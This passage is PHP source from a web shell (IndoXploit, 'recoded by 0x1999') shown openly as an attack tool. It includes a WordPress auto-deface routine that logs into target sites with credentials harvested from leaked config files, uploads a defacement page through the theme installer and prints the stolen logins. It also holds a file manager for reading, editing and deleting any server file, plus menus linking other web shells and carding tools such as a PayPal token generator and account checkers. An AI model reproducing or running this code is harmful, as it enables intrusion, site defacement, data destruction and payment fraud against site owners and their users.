4072. fputs($fp5,$upload3);
4073. $post2 = array(
4074. "_wpnonce" => "$anu2",
4075. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
4076. "themezip" => "@$www",
4077. "install-theme-submit" => "Install Now",
4078. );
4079. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
4080. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4081. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4082. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4083. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4084. curl_setopt($ch, CURLOPT_POST, 1);
4085. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
4086. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4087. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4088. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4089. $data3 = curl_exec($ch);
4090. curl_close($ch);
4091. $y = date("Y");
4092. $m = date("m");
4093. $namafile = "id.php";
4094. $fpi = fopen($namafile,"w");
4095. fputs($fpi,$script);
4096. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
4097. curl_setopt($ch6, CURLOPT_POST, true);
4098. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
4099. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
4100. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
4101. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
4102. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
4103. $postResult = curl_exec($ch6);
4104. curl_close($ch6);
4105. $as = "$target/k.php";
4106. $bs = anucurl($as);
4107. if(preg_match("#$script#is", $bs)) {
4108. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
4109. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
4110. } else {
4111. echo "[-] <font color='red'>gagal mepes...</font><br>";
4112. echo "[!!] coba aja manual: <br>";
4113. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
4114. echo "[+] username: <font color=lime>$user</font><br>";
4115. echo "[+] password: <font color=lime>$pass</font><br><br>";
4116. }
4117. mysql_close($conn);
4118. }
4119. }
4120. } else {
4121. echo "<center><h1>WordPress Auto Deface V.2</h1>
4122. <form method='post'>
4123. Link Config: <br>
4124. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
4125. <input type='text' name='script' height='10' size='50' placeholder='Hacked By 0x1999' required><br>
4126. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
4127. </form></center>";
4128. }
4129. } elseif($_GET['act'] == 'newfile') {
4130. if($_POST['new_save_file']) {
4131. $newfile = htmlspecialchars($_POST['newfile']);
4132. $fopen = fopen($newfile, "a+");
4133. if($fopen) {
4134. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
4135. } else {
4136. $act = "<font color=red>permission denied</font>";
4137. }
4138. }
4139. echo $act;
4140. echo "<form method='post'>
4141. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
4142. <input type='submit' name='new_save_file' value='Submit'>
4143. </form>";
4144. } elseif($_GET['act'] == 'newfolder') {
4145. if($_POST['new_save_folder']) {
4146. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4147. if(!mkdir($new_folder)) {
4148. $act = "<font color=red>permission denied</font>";
4149. } else {
4150. $act = "<script>window.location='?dir=".$dir."';</script>";
4151. }
4152. }
4153. echo $act;
4154. echo "<form method='post'>
4155. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4156. <input type='submit' name='new_save_folder' value='Submit'>
4157. </form>";
4158. } elseif($_GET['act'] == 'rename_dir') {
4159. if($_POST['dir_rename']) {
4160. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4161. if($dir_rename) {
4162. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4163. } else {
4164. $act = "<font color=red>permission denied</font>";
4165. }
4166. echo "".$act."<br>";
4167. }
4168. echo "<form method='post'>
4169. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4170. <input type='submit' name='dir_rename' value='rename'>
4171. </form>";
4172. } elseif($_GET['act'] == 'delete_dir') {
4173. function Delete($path)
4174. {
4175. if (is_dir($path) === true)
4176. {
4177. $files = array_diff(scandir($path), array('.', '..'));
4178. foreach ($files as $file)
4179. {
4180. Delete(realpath($path) . '/' . $file);
4181. }
4182. return rmdir($path);
4183. }
4184. else if (is_file($path) === true)
4185. {
4186. return unlink($path);
4187. }
4188. return false;
4189. }
4190. $delete_dir = Delete($dir);
4191. if($delete_dir) {
4192. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4193. } else {
4194. $act = "<font color=red>could not remove ".basename($dir)."</font>";
4195. }
4196. echo $act;
4197. } elseif($_GET['act'] == 'view') {
4198. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4199. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
4200. } elseif($_GET['act'] == 'edit') {
4201. if($_POST['save']) {
4202. $save = file_put_contents($_GET['file'], $_POST['src']);
4203. if($save) {
4204. $act = "<font color=lime>Saved!</font>";
4205. } else {
4206. $act = "<font color=red>permission denied</font>";
4207. }
4208. echo "".$act."<br>";
4209. }
4210. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4211. echo "<form method='post'>
4212. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4213. <input type='submit' value='Save' name='save' style='width: 500px;'>
4214. </form>";
4215. } elseif($_GET['act'] == 'rename') {
4216. if($_POST['do_rename']) {
4217. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4218. if($rename) {
4219. $act = "<script>window.location='?dir=".$dir."';</script>";
4220. } else {
4221. $act = "<font color=red>permission denied</font>";
4222. }
4223. echo "".$act."<br>";
4224. }
4225. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4226. echo "<form method='post'>
4227. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
4228. <input type='submit' name='do_rename' value='rename'>
4229. </form>";
4230. } elseif($_GET['act'] == 'delete') {
4231. $delete = unlink($_GET['file']);
4232. if($delete) {
4233. $act = "<script>window.location='?dir=".$dir."';</script>";
4234. } else {
4235. $act = "<font color=red>permission denied</font>";
4236. }
4237. echo $act;
4238. }else {
4239. if(is_dir($dir) == true) {
4240. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
4241. <tr>
4242. <th class="th_home"><center>Name</center></th>
4243. <th class="th_home"><center>Type</center></th>
4244. <th class="th_home"><center>Size</center></th>
4245. <th class="th_home"><center>Last Modified</center></th>
4246. <th class="th_home"><center>Permission</center></th>
4247. <th class="th_home"><center>Action</center></th>
4248. </tr>';
4249. $scandir = scandir($dir);
4250. foreach($scandir as $dirx) {
4251. $dtype = filetype("$dir/$dirx");
4252. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
4253. if(!is_dir("$dir/$dirx")) continue;
4254. if($dirx === '..') {
4255. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
4256. } elseif($dirx === '.') {
4257. $href = "<a href='?dir=$dir'>$dirx</a>";
4258. } else {
4259. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4260. }
4261. if($dirx === '.' || $dirx === '..') {
4262. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
4263. } else {
4264. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
4265. }
4266. echo "<tr>";
4267. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
4268. echo "<td class='td_home'><center>$dtype</center></td>";
4269. echo "<td class='td_home'><center>-</center></th>";
4270. echo "<td class='td_home'><center>$dtime</center></td>";
4271. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4272. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
4273. }
4274. echo "</tr>";
4275. foreach($scandir as $file) {
4276. $ftype = filetype("$dir/$file");
4277. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4278. $size = filesize("$dir/$file")/1024;
4279. $size = round($size,3);
4280. if($size > 1024) {
4281. $size = round($size/1024,2). 'MB';
4282. } else {
4283. $size = $size. 'KB';
4284. }
4285. if(!is_file("$dir/$file")) continue;
4286. echo "<tr>";
4287. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
4288. echo "<td class='td_home'><center>$ftype</center></td>";
4289. echo "<td class='td_home'><center>$size</center></td>";
4290. echo "<td class='td_home'><center>$ftime</center></td>";
4291. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4292. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
4293. }
4294. echo "</tr></table>";
4295. } else {
4296. echo "<font color=red>can't open directory</font>";
4297. }
4298. }
4299. echo "<center><hr><form>
4300. <select onchange='if (this.value) window.open(this.value);'>
4301. <option selected='selected' value=''> Tools Creator </option>
4302. <option value='$ling=wso'>WSO 2.8.1</option>
4303. <option value='$ling=injection'>1n73ction v3</option>
4304. <option value='$ling=wk'>WHMCS Killer</option>
4305. <option value='$ling=adminer'>Adminer</option>
4306. <option value='$ling=b374k'>b374k Shell</option>
4307. <option value='$ling=b374k323'>b374k 3.2</option>
4308. <option value='$ling=bh'>BlackHat Shell</option>
4309. <option value='$ling=dhanus'>Dhanush Shell</option>
4310. <option value='$ling=r57'>R57 Shell</option>
4311. <option value='$ling=encodedecode'>Encode Decode</option>
4312. <option value='$ling=r57'>R57 Shell</option>
4313. </select>
4314. <select onchange='if (this.value) window.open(this.value);'>
4315. <option selected='selected' value=''> Tools Carder </option>
4316. <option value='$ling=extractor'>DB Email Extractor</option>
4317. <option value='$ling=promailerv2'>Pro Mailer V2</option>
4318. <option value='$ling=bukalapak'>BukaLapak Checker</option>
4319. <option value='$ling=tokopedia'>TokoPedia Checker</option>
4320. <option value='$ling=tokenpp'>Paypal Token Generator</option>
4321. <option value='$ling=mailer'>Mailer</option>
4322. <option value='$ling=gamestopceker'>GamesTop Checker</option>
4323. </select>
4324. <noscript><input type='submit' value='Submit'></noscript>
4325. </form>Copyright &copy; ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a> Shell Recoded By <a href='http://fb.com/0x1999-410646679131007' target='_BLANK'><font color=lime>0x1999</a></font></center>";
4326. ?>
4327. </html>